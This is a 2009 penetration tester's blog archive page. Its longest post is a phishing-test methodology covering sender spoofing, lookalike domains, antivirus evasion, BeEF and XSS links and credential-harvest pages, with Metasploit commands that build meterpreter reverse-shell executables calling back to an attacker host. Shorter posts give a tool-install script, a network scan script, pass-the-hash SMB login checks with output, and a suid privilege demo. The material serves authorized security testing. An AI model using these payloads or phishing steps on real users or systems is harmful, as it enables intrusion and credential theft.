HexEsec | a pentester's view » Uncategorized

Testing your susceptibility to phishing attacks – Are your technical controls helping?

jcran — Wed, 16 Dec 2009 23:34:30 +0000

Phishing is one of those things people either love or hate (A lot of it depends on which side of the water you’re on). That said, the subject of phishing tends to make most admins nervous, as they /know/ their users are going to be susceptible. In my experience, that’s true. However, there’s an awful lot of technical controls that can help prevent phishers from being successful. This methodology was developed to help test those technical controls. It’s a work in progress, but i want to get it out there for your use.

Attack Methodology (Theory)

The purpose of this attack methodology is to provide a repeatable way to test a client’s susceptibility to attacks sent over email. The attack methodology progressively increases in cleverness / technical ability of the attack. It aims to test not only the user’s awareness of a social engineering attack, but also the controls which prevent such attacks.

Many security controls are now involved when sending a simple email. A list of some of those controls:

Public Availability of Email Addresses / Sensitive Information
MX Configuration
- Relaying Allowed?
- MX Reputation Filtering?
Spam Filtering Capabilities
- Client-Side
- Server-Side
Spam Neutering Capabilities
- Client-Side – disables links
- Server-Side – disables links, disables binaries
Antivirus Capabilities
- Client-Side – quarantines / deletes binaries
- Server-Side -
Firewall Configuration
- Inbound Traffic
- Outbound Traffic
Traffic Proxying

Ways in which we can influence the success of the attack:

Spoof the sending email address
Source from a more reputable MX
make the binary look less malicious
- Encode, or encrypt it to bypass AV
remove the binary, and place a link
- ensure the binary connects back (rather than doing a bindshell <– you’d be dumb to do this [NAT])
  - ensure the binary uses proxy settings (passiveX)
- send a link containing the malicious payload in an xss vector
- send a link containing the malicious payload in a /stored/ xss vector

Email Sources:

Gmail / Hotmail / Other Free Email Service
Register similar-sounding domain, use your mailserver
Known (Compromised) Email Server on client’s domain
Other Known Email Server
Unknown Email Server – Attacker’s box

Social Engineering Plausibility (This is a whole subject in its own right):

Send a single link
Send a link w/ a story
Send a link w/ a story from “the security department” / “the administrator” /
Send a link w/ a story from
- Better yet, get his actual sig
Send a link from a “friend”
- harvest from myspace / twitter / etc
Register new account under known friend’s name, steal their picture / info, send a new link.
Set up a site to host “security patches” or “new improved notepad.exe”, send a link

Payload Types:

binary
- malicious connect-back binary or script (unencrypted) —– test AV
- malicious connect-back binary or script (encrypted) –/
- malicious file (exploiting vulnerability in target’s system)
  - Adobe PDF
  - Flash FLV
  - Microsoft DOCX,PPTX,XLSX, etc
link
- to page asking for personal information (email passwords – OWA)
- to page w/ malicious binary (to be downloaded)
- to page w/ an exploit (metasploit is good here)
- to page w/ malicious exploit pack (multiple binaries tried via javascript – browser auto_pwn)
- to page w/ malicious active-x control (passive-x)
- to page w/ beef hook (can be encoded)
- to reflected xss w/ beef
- to stored xss containing beef

(add google analytics to any of these for easy tracking of victims)

Attack Methodology (Practical)

Payloads

Prepare payloads
- Prepare handler (on [ATTACKER-IP]) – listening on :443 so we avoid most egress filtering… :
  - ./toolkit/nix/framework-net/metasploit-svn/msfconsole
    use exploit/multi/handler
    set ExitOnSession false
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [ATTACKER-IP]
    set LPORT 443
    save
    exploit -j
- connect back, unencrypted:
  - ./toolkit/nix/framework-net/metasploit-svn/msfpayload windows/meterpreter/reverse_tcp LHOST=[ATTACKER-IP] LPORT=443 R| ./toolkit/nix/framework-net/metasploit-svn/msfencode -t exe -e generic/none -o unencrypted.exe;
- connect back, encrypted:
  - ./toolkit/nix/framework-net/metasploit-svn/msfpayload windows/meterpreter/reverse_tcp LHOST=[ATTACKER-IP] LPORT=443 R| ./toolkit/nix/framework-net/metasploit-svn/msfencode -t exe -o encrypted.exe;
- google analytics
- beef hook script
- beef hook via xss

Server

Prepare Email Servers
- Register .Security@gmail.com (or some similar Gmail address)
- Setup Local MX
  - utilize SEF, or some other form of Perl::MIME
- Prepare Remotely-Accessible MX
- Register Client Domains

Now that you’ve prepared, you can use each server type, to send each payload type.

Using GMAIL

Send unencrypted binary (TEST-1)
Send encrypted binary (TEST-2)
Send link to page w/ script (TEST-3)

What this tests

Spam Filtering
Content Filtering

Using a Local (Unknown to target) MX

Send unencrypted binary (TEST-4)
Send encrypted binary (TEST-5)
Send link to page w/ script (TEST-6)

What this tests

This shouldn’t make it through.

Spam Filtering
Content Filtering
MX Reputation Analysis

Using a known, valid MX

Register domain (similar to target)
Set domain MX records to remotely-accessible mail server
Send unencrypted binary (TEST-7)
Send encrypted binary (TEST-8)
Send link to page w/ script (TEST-9)

What this tests

This will likely make it through.

Spam Filtering
Content Filtering
MX Reputation Analysis

Using a Target-owned MX

Search for any internal relays
- repeat above steps, sending through internal relay

What this tests

Spam Issues

Measuring Success

For a pentest, it’s useful to know as much information about the clients as possible. You also want some way to maintain access.

What you don’t want:
- Multiple connect-backs to a single netcat listener

What you do want:
- Users entering their information
- Meterpreter payloads, with a handler waiting for connect-backs
- Google Analytics
  - Register a new site here: http://www.google.com/analytics/

References

https://help.ubuntu.com/community/PostfixBasicSetupHowto – Postfix on ubuntu / debian

what should be considered a vulnerability?

jcran — Tue, 15 Dec 2009 10:53:20 +0000

…And now, a rant.

What should be considered (and reported) as a vulnerability when auditing a network?

Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn’t that a vulnerability? Can we detect it?

What are today’s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?

Isn’t that a vulnerability? (hint – pass-the-hash)

What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?

pentesting with an ubuntu box

jcran — Fri, 20 Nov 2009 03:39:07 +0000

here’s a recent drop of a script i use to configure my ubuntu box for pentesting. yes, i could use backtrack (and i do — especially if i’m having wireless issues), but this is a quick way to get an ubuntu box up & running. cheers -jcran

#!/bin/bash

# System Configuration & Utilities
apt-get -y install build-essential
apt-get -y install linux-headers-`uname -r`
apt-get -y install sysvconfig
apt-get -y install bum         ## Boot-Up Manager
apt-get -y install tofrodos    ## DOS utils
apt-get -y install xinetd      ## why not.
apt-get -y install unrar       ## RAR support
apt-get -y install p7zip-full ## 7-Zip support
apt-get -y install fcrackzip   ## Zip cracking
apt-get -y install ipcalc      ## handy
apt-get -y install sharutils   ## uuencode / uudecode
apt-get -y install xclip       ## piping is handy
apt-get -y install ldap-utils
apt-get -y install cabextract ## damn microsoft and their fascist compression formats!
apt-get -y install g++
apt-get -y install ssh

## Network services
apt-get -y install samba
apt-get -y install nis
apt-get -y install nfs
apt-get -y install smbfs       ## samba utilities
## apt-get -y install tftpd    ## you need to modify the /etc/init.d file…

# system monitoring
apt-get -y install ntop        ##
apt-get -y install sysstat     ## iostat,sar,mpstat
apt-get -y install procinfo

# Package Management
#apt-get -y install apt-build
#apt-get -y install apt-dpkg-ref
#apt-get -y install apt-listbugs
apt-get -y install apt-file
#apt-get -y install apt-howto
apt-get -y install apt-utils
apt-get -y install apt-listchanges
apt-get -y install dconf

# Terminal Emulators
apt-get -y install tn5250
apt-get -y install screen

# Filesystem Support
apt-get -y install sshfs
apt-get -y install ntfs-3g
apt-get -y install ntfs-config
apt-get -y install ntfsprogs
apt-get -y install mkisofs

# Gnome-Specific Configuration
apt-get -y install gconf
apt-get -y install gnomebaker
apt-get -y install nautilus-open-terminal

# ISAKMPD
# apt-get -y install isakmpd
apt-get -y install vpnc

# Multimedia
apt-get -y install amarok
apt-get -y install xmms
apt-get -y install xmms-skins
apt-get -y install xmms-mp4
apt-get -y install mpg123
apt-get -y install totem-xine
apt-get -y install ksnapshot
apt-get -y install istanbul
apt-get -y install recordmydesktop
apt-get -y install gtk-recordmydesktop
apt-get -y install xvidcap

# Basics

# Netcat & Tunnelling
apt-get -y install netcat
apt-get -y install sbd
apt-get -y install cryptcat
apt-get -y install socat
apt-get -y install vtun
apt-get -y install stunnel

# Scanning Tools
apt-get -y install nmap
apt-get -y install nessusd
apt-get -y install nessus
apt-get -y install fping
apt-get -y install hping2
apt-get -y install hping3
apt-get -y install scapy
apt-get -y install snmp
#apt-get -y install sing    #send icmp nasty garbage
apt-get -y install traceroute
apt-get -y install tcptraceroute
apt-get -y install ike-scan ## ipsec vpn tool
apt-get -y install nbtscan ## cifs info tool
apt-get -y install sslscan

# Passive Scanning Tools
apt-get -y install p0f
apt-get -y install pads

# Sniffing Tools
apt-get -y install wireshark
apt-get -y install ettercap
apt-get -y install ettercap-gtk
apt-get -y install tcpdump
apt-get -y install tcpflow
apt-get -y install ssldump
apt-get -y install nemesis   # packet injection
apt-get -y install dsniff
apt-get -y install etherape

# Libraries
apt-get -y install libssl       #Medusa
apt-get -y install libssl-dev       #Medusa
apt-get -y install libssh-2       #Medusa
apt-get -y install python-pycurl   #wfuzz
apt-get -y install libnet-dns-perl   #fierce.pl
apt-get -y install libsnmp-perl       #??
apt-get -y install libcrypt-ssleay-perl #HEAD,GET,POST, libwhisker
apt-get -y install libnet-ssleay-perl   # “”     “”
apt-get -y install ncurses-dev       # kismet-newcore
apt-get -y install libpcap-dev       # kismet-newcore

# Cracking Tools
apt-get -y install john
apt-get -y install medusa
## apt-get -y install hydra? ## not really that useful..

# Wireless Tools
##apt-get -y install kismet ## disabled because of kismet-ng
apt-get -y install aircrack
apt-get -y install aircrack-ng

# App Layer Tools
apt-get -y install wget
apt-get -y install curl
apt-get -y install nikto

## Scripting
apt-get -y install ruby
apt-get -y install python
apt-get -y install perl
apt-get -y install perl-doc
apt-get -y install gawk
apt-get -y install vim-ruby
apt-get -y install vim-python

## Ruby – Gems
apt-get -y install gems
apt-get -y install rubygems

## Metasploit dependencies
apt-get -y install libopenssl-ruby
apt-get -y install ruby-libglade2
apt-get -y install libgtk2-ruby

## Scapy – Python Dependencies – http://www.secdev.org/projects/scapy/portability.html
apt-get -y install graphviz       # graph stuff
apt-get -y install imagemagick       # graph stuff
apt-get -y install python-gnuplot   # PacketList.plot()
apt-get -y install python-crypto   # WEP Stuff
apt-get -y install python-visual   # 3D Stuff
apt-get -y install python-pyx       # pdfdump() / psdump()
apt-get -y install acroread
apt-get -y install gv
apt-get -y install sox

## ProxyStrike Dependencies
apt-get -y install python-qt4
apt-get -y install python-openssl

## W3af Dependencies
apt-get -y install python-pyparsing
apt-get -y install python-pydot
apt-get -y install python-soappy

## Coding
##apt-get -y install eclipse – get the latest version…
apt-get -y install kdevelop
apt-get -y install subversion
apt-get -y install rapidsvn
apt-get -y install vim-full
apt-get -y install git
apt-get -y install git-core

## Documentation
apt-get -y install notecase
apt-get -y install vim
apt-get -y install liferea

## Web / Browser Utilities
apt-get -y install azureus
apt-get -y install opera
apt-get -y install filezilla
apt-get -y install flashplugin-nonfree
apt-get -y install pidgin
apt-get -y install pidgin-otr
apt-get -y install thunderbird
apt-get -y install lightning-extension
apt-get -y install enigmail
apt-get -y install irssi
apt-get -y install silc
apt-get -y install tor

## Windows Stuff
apt-get -y install wine
apt-get -y install quicksynergy

## Encryption
apt-get -y install dmsetup
apt-get -y install password-gorilla
apt-get -y install gpa
apt-get -y install seahorse

## Java
apt-get -y install sun-java6-jre
apt-get -y install sun-java6-plugin

#set our java version to java-6-sun as this plays well with burpsuite
update-java-alternatives -s java-6-sun

## Upgrade & Such
apt-get update
apt-get upgrade
apt-get dist-upgrade

## Remove auto-start services
update-rc.d -f exim4 remove
update-rc.d -f tor remove
update-rc.d -f ntop remove
update-rc.d -f p0f remove ## not sure this is necessary
update-rc.d -f pads remove
update-rc.d -f isakmpd remove
update-rc.d -f nessusd remove
update-rc.d -f cups remove
update-rc.d -f samba remove
update-rc.d -f nis remove
update-rc.d -f nfs-common remove

### Manual installs
### ——————————————————————————————
### truecrypt — http://www.howtogeek.com/howto/ubuntu/install-truecrypt-on-ubuntu-edgy/
###            – you will need the linux kernel source for this one…
### onesixtyone — http://www.phreedom.org/solar/onesixtyone/
### libdvdcss2 — “sudo /usr/share/doc/libdvdread3/./install-css.sh”

### oh yes, and pull down the “real” toolkit from subversion - email if you’re interested in this -> jcran_AT_0×0e.org

you can also download the script here: http://www.0×0e.org/x/consultant_ubuntu_setup.sh

WiFiFoFum for locating rogue access points!

jcran — Fri, 20 Nov 2009 03:15:20 +0000

what’s that you say? The PCI DSS (wireless supplement) now requires that you have to do quarterly wireless scanning at your facility?

oh? you have no budget?

no problem. get an ipod touch, and download WiFiFoFum from Aspecto Software. For $2.99, you’ve got yourself a wireless scanning solution.

local network enumeration

jcran — Wed, 18 Nov 2009 10:21:25 +0000

UPDATED: 11/19/2009

little script i threw together for local network enumeration – uses arp-scan, propecia, and nmap. was going to use it to dynamically generate my subnet (hence the IP parsing), but got lazy at the last minute.

#!/bin/bash
##jcran – 2009

## Gather user options
## ——————–
if [ $# -lt 1 ]; then
echo “Usage: $0 [projectname] [scan? (0/1) ] “
exit -1
fi

PROJECT=$1 ## name of the project
SCAN=$2 ## whether to scan with propecia / nmap

echo “creating project $PROJECT”

if [ -d $PROJECT ]; then
echo “project exists”
else
mkdir $PROJECT
fi

IP=`ifconfig eth0 | grep “inet addr:” | ips |cut -d “:” -f 2 | cut -d ” ” -f 1`
SUBNET=`ifconfig eth0 | grep “inet addr:” | ips |cut -d “:” -f 3 | cut -d ” ” -f 1`
RANGE=`ipcalc $IP/$SUBNET | grep “Network:” | cut -d ‘ ‘ -f 4`

echo $RANGE

if [ $SCAN -eq 1 ]; then

echo arp scanning “$RANGE”
sudo arp-scan “$RANGE” –interface eth0 > $PROJECT/arp.targets.txt

echo local segment targets
cat $PROJECT/arp.targets.txt | ips > $PROJECT/ip.targets.txt

echo “scanning for web servers – :80, :443″
propecia $RANGE 80 > $PROJECT/80.targets.txt
propecia $RANGE 443 > $PROJECT/443.targets.txt

echo “scanning for basics – :21 :22 :23 :111″
propecia $RANGE 21 > $PROJECT/21.target.txt
propecia $RANGE 22 > $PROJECT/22.targets.txt
propecia $RANGE 23 > $PROJECT/23.targets.txt
propecia $RANGE 111 > $PROJECT/111.targets.txt

echo “scanning for windows boxes – :445″
propecia $RANGE 445 > $PROJECT/445.targets.txt

echo “scanning for sql server tds – :1433″
propecia $RANGE 1433 > $PROJECT/1433.targets.txt

echo “scanning for oracle tns – :1521″
propecia $RANGE 1521 > $PROJECT/1521.targets.txt

echo nmap-scanning local ips
nmap -iL $PROJECT/ip.targets.txt -oA $PROJECT/local-attack

fi

cheers

-jcran

owning a windows network

jcran — Fri, 06 Nov 2009 15:56:26 +0000

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo

Basic options:
Name       Current Setting Required Description
—-       ————— ——– ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09′, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

checking valid windows logins with metasploit

jcran — Fri, 06 Nov 2009 06:19:11 +0000

so you have some windows creds, and you want to check if they’re valid or not. turns out there’s a bunch of ways to do this:

1) auxiliary/scanner/smb/login
2) db_autopwn -m
3) msfcli scripting
4) sussuro’s method (python scripting through xmlrpc)

others?

exploiting suid binaries

jcran — Wed, 14 Oct 2009 19:44:41 +0000

just had a quick refresher on exploiting suid bits (and why they’re so darn evil):

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u+s id

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) euid=0(root) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u-s id

The first time it’s executed (no suid bit) – the euid is 1000, jcran. the second time, after the suid bit has been set, i’m effectively root.

finding all suid binaries on a system:

 find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;

note, this technique doesn’t work on bash if it’s been set SUID.

exception has been thrown by the target of an invocation (bing + mono = fail)

jcran — Sun, 04 Oct 2009 02:31:09 +0000

if an app crashes on the internet, and no one is around to hear it....

security product recommendations in a pentest?

jcran — Tue, 29 Sep 2009 06:29:57 +0000

is there room for it?

after reading this post on the metasploit blog, i started thinking about how well I currently evaluate product implementations within a typical penetration test. If configuration auditing has been included, I’ll do some of this. However, as a pentester, it pays to know the products in use, and to be familiar with the differences between say, trend micro and kaspersky antivirus or Splunk and syslog. It would be useful to include specific measurements and recommendations around the products in use on the network.

for instance:

Antivirus: Trend Micro – Configured properly, managed well. Recently garnered the top spot in an
Spam filtering: Ironport – Not well configured. Recommend moving to the Sophos appliance for ease of use. (based on strengths of the team)
Monitoring: Snort – Configured poorly. Recommend switching to bro to support policy / functionality separation. would streamline IT processes
Vuln scanning: Nessus – AdHoc – Need to move to automated process, more advanced web-scanning tool. Look into qualys / ncircle / rapid7.
Firewall: Cisco PIX
Logging: Syslog server – …
etc..

Now, the issue becomes two-fold. one, the tester needs to have a solid understanding of each of the products he’s evaluating / recommending and a clear understanding of the client’s needs. It’s not a typical penetration test function, but would definitely provide value to a customer. (The more i write here, the more it turns into a full configuration audit of the customer’s systems, and while would be a nice-to-have on a pentest, isn’t part of a typical assessment)

i think most shops steer clear of this under the ‘product agnostic’ label, but as long as that’s been made clear up front, i’d say go for it.